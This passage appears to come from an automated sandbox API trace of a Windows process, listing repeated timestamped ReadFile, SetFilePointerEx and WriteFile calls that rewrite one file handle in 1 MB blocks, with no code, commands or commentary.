hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.962] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.963] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.974] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.974] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.976] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0052.989] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.989] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0052.991] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0053.012] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0053.012] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0053.018] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0053.035] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0053.035] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0053.037] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0053.073] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0053.073] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0053.075] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0053.167] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0053.167] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0053.169] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0053.188] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0053.188] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0053.190] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0053.217] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0053.217] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0053.219] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0053.245] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0053.245] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0053.247] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0053.261] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0053.261] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0053.263] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0053.293] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0053.293] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0053.295] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0053.308] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0053.308] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0053.310] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0053.343] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0053.343] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0053.345] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0053.368] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0053.368] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0053.370] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0053.388] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0053.388] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0053.391] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0053.416] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0053.416] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0053.418] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0053.440] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0053.440] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0053.442] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0053.455] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0053.455] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0053.457] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0053.486] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0053.486] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0053.488] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0053.503] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0053.503] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0053.505] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0053.883] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0053.883] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0053.885] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0053.974] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0053.974] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0053.976] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0053.990] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0053.990] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0053.992] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0054.005] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.005] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0054.007] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0054.070] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.070] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0054.072] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0054.091] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.091] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0054.107] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0054.191] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.191] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0054.193] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0054.207] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.207] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0054.209] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0054.272] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.272] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0054.275] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0054.287] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.287] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0054.289] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0054.306] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.306] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0054.324] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0054.337] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.337] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0054.339] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0054.376] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.376] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0054.378] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0054.392] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.393] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0054.394] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0054.419] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.419] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0054.421] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0054.438] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.438] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0054.440] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0054.466] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.466] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0054.468] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0054.482] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 